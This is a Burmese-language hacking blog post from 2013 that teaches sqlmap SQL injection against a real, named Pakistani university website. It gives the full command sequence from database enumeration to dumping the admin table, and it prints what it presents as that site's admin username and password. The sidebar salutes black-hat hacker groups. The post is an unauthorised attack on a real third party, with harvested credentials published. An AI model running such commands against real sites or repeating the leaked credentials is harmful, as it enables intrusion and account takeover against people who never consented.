SQL Map ကို Python နဲ ့ develop လုပ္ထားျပီးေတာ့ Backtrack 5, Backtrack 5 R1 အပါအ၀င္ Backtrack Version အားလံုးမွာ ပါ၀င္တဲ့ အေကာင္းဆံုး SQL injection tool တစ္ခုပါ။ သူက database တစ္ခုလံုးကုိ takeover လုပ္လို ့ရတဲ့ powerful tool တစ္ခုလည္းျဖစ္ပါတယ္။
အရင္ဆံုး Vulnerable terget တစ္ခု လိုအပ္ပါတယ္ ။
(က်ေနာ္ကေတာ့ http://www.hu.edu.pk/viewfaculty.php?id=12 ဆိုတဲ့ Pakistan Site တစ္ခုနဲ ့ဥပမာေပးျပီး ရွင္းျပေပးသြားပါမယ္။)
Backtrack terminal ထဲကို သြားျပီးေတာ့ cd/pentest/database/sqlmap လို ့ရိုက္ထည့္လိုက္ပါ။
Sqlmap ကို run ဖို ့အတြက္ သံုးရမယ့္ command ေတြကေတာ့
(-u ဆိုတာက vulnerable url)./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12
သို ့မဟုတ္./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs
တကယ္လို ့ --dbs လို ့အသံုးျပဳရင္ေတာ့ server ထဲမွာ ရွိတဲ့ database အားလံုးကို fetch လုပ္မွာျဖစ္ျပီး./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
-- current-db ဆိုရင္ေတာ့ current website နဲ ့ related ျဖစ္တဲ့ database ကိုပဲ fetch လုပ္မွာျဖစ္ပါတယ္။ ဒါဆိုရင္ database name ကို ရမွာျဖစ္ပါတယ္။
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results –tables
ဒီမွာ -D ဆိုတာကေတာ့ database name နဲ ့ - tables ဆိုတာကေတာ့ current database ထဲမွာ ရွိတဲ့ tables ေတြကို fetch လုပ္ဖို ့ျဖစ္ျပီးေတာ့ table name ကို ရမွာျဖစ္ပါတယ္။
ဒါကေတာ့ table ထဲမွာ ရွိတဲ ့columns name ေတြကို ရယူဖို ့အတြက္ျဖစ္ျပီး./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns
ဒါဆိုရင္ေတာ့ "admin" ဆိုတဲ့ table ထဲမွာရွိတဲ့ information အားလံုးကို ရျပီဆိုရင္ေတာ့ process အားလံုးျပီးျပီဗ်။./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name –dump
Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123
Sunday, August 4, 2013
//
Labels:
Hacking Tutorial
//
2
comments
//
2 comments to "SQL Map"
Post a Comment
သင့္ရဲ ့ comment မ်ားက ကြ်န္ေတာ္တို႔လို blogger ေတြ အတြက္ အားေဆးတစ္ခြက္ပါ။
ေကာင္းသည္၊ ဆုိးသည္ ေရးႏုိင္ပါသည္။ လိုအပ္သည္မ်ားကိုလည္းေဝဖန္အၾကံေပးႏုိင္ပါသည္။
Powered by Blogger.
Respect List
Blink Hacker Group
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Myanmar Hacker Uniteam
Brotherhood of Myanmar Hackers
and All Myanmar Attackers & All Myanmar Black Hats.
Categories
@Lph@ blog ကို Android Devices ေတြေပၚကဖတ္ခ်င္ရင္
Link list 1
- Application (1)
- E-book (2)
- Facebook Tips & Tricks (2)
- Hacking Tutorial (37)
- HTML (2)
- Kali Linux (6)
- Mobile Tips & Tricks (5)
- Myanmar Cyber Army (1)
Popular Posts
-
Local File Inclusion Vulnerability ကို အသံုးခ်ျပီး Shell upload လုပ္ဖို ့အတြက္ common parameter အခ်ိဳ ့ကို သိထားဖို ့လိုအပ္ပါတယ္။ index.p...
-
Kali Linux အသံုးျပဳသူေတြ အတြက္ အသံုး၀င္မယ့္ Tools ေတြရဲ ့ Descriptions ေတြရယ္ အသံုးျပဳပံုေတြ ပါ၀င္ပါတယ္။ Kali Linux ကို အသံုးျပဳေနတယ္ဆိုရ...
Anonymous says:
အသစ္မွတ္လို႕ ခြီးလိုမွျဗဲး ..သီေပါးမင္း လက္ထက္ထည္းက နည္းၾကီးပဲ ဟ
Anonymous says:
ရွင္းျပထားတာအရမ္းေကာင္းပါတယ္။ BT နဲ႔ပတ္သက္ၿပီးေလ့လာခ်င္လို႕ BT အေၾကာင္းမ်ားမ်ားတင္ေပးပါ။